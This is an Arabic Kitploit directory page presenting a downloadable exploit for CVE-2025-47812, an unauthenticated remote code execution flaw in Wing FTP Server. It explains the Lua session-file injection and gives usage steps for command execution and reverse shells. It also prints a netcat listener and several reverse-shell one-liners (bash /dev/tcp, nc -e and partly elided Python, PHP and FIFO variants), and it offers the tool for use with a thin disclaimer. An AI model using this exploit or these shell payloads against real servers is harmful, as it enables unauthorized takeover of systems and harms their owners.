Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-47812 — استغلال تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليه لـ Wing FTP Server < 7.4.4، يتيح تنفيذ الأوامر والقذائف العكسية عبر حقن Lua في ملفات الجلسة. | Kitploit
أدوات/GitHubGitHub/blindma1den/cve-2025-47812
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

استغلال تنفيذ التعليمات البرمجية عن بُعد غير المصادق عليه لـ Wing FTP Server < 7.4.4، يتيح تنفيذ الأوامر والقذائف العكسية عبر حقن Lua في ملفات الجلسة.

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-47812 - ثغرة تنفيذ التعليمات البرمجية عن بعد (RCE) في خادم Wing FTP Server

===========================================================

المؤلف: blindma1den

التاريخ: يوليو 2025

نوع الاستغلال: تنفيذ التعليمات البرمجية عن بعد (بدون مصادقة)

الهدف: خادم Wing FTP Server الإصدار < 7.4.4

درجة CVSS: 10.0 (حرجة)


الوصف

يستغل هذا السكريبت ثغرة CVE-2025-47812، وهي ثغرة خطيرة في واجهة الويب لخادم Wing FTP Server تسمح للمهاجمين عن بُعد بتنفيذ أوامر نظام عشوائية أو فتح شل عكسي بدون مصادقة.

سبب الثغرة هو التعامل غير السليم مع البايتات الفارغة (%00) في نموذج تسجيل الدخول (/loginok.html). وهذا يسمح بحقن كود Lua في ملفات الجلسة، والتي يتم تقييمها لاحقًا عند الوصول إلى نقاط النهاية مثل /dir.html.


المصادر

وصف NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


الميزات

  • تنفيذ الأوامر (مثل: whoami، uname -a)
  • حمولات متعددة للشل العكسي
  • استخراج كuki جلسة UID تلقائيًا
  • تطبيق Python 3 نظيف وقابل للتوسيع

  • المتطلبات

    • Python 3.7+
    • وحدة requests

    تثبيت التبعيات:

    root@kitploit:~
    pip install requests
    

    طريقة الاستخدام

    شغّل السكريبت:

    root@kitploit:~
    python3 wingftp_rce_exploit.py
    

    سيُطلب منك إدخال:

    • رابط الهدف (مثل: http://127.0.0.1:5466)
    • اسم المستخدم (الافتراضي: anonymous)
    • وضع الاستغلال: [1] تشغيل أمر [2] تشغيل شل عكسي

    أمثلة

    [1] تشغيل أمر:

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 1
    Command to execute (default: whoami): whoami
    

    [2] الشل العكسي:

    root@kitploit:~
    Target URL: http://192.168.1.10:5466
    Username: anonymous
    Your choice (1 or 2): 2
    Reverse shell IP address: 192.168.1.100
    Reverse shell port: 4444
    

    شغّل المستمع الخاص بك قبل تشغيل الشل:

    root@kitploit:~
    nc -lvnp 4444
    

    الحمولات المستخدمة (شل عكسي)

    Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

    Python3: python3 -c 'import socket,subprocess,os; ...'

    Netcat: nc IP PORT -e /bin/sh

    PHP: php -r '$sock=fsockopen("IP",PORT); ...'

    FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


    إخلاء المسؤولية

    هذا الكود لأغراض تعليمية فقط. لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستخدام غير المصرح به غير قانوني وغير أخلاقي.

    قم بتحديث أنظمتك فورًا. الإصدار 7.4.4 من Wing FTP Server يعالج هذه الثغرة.

    استمتع بالاختراق!

    تنزيل الأداة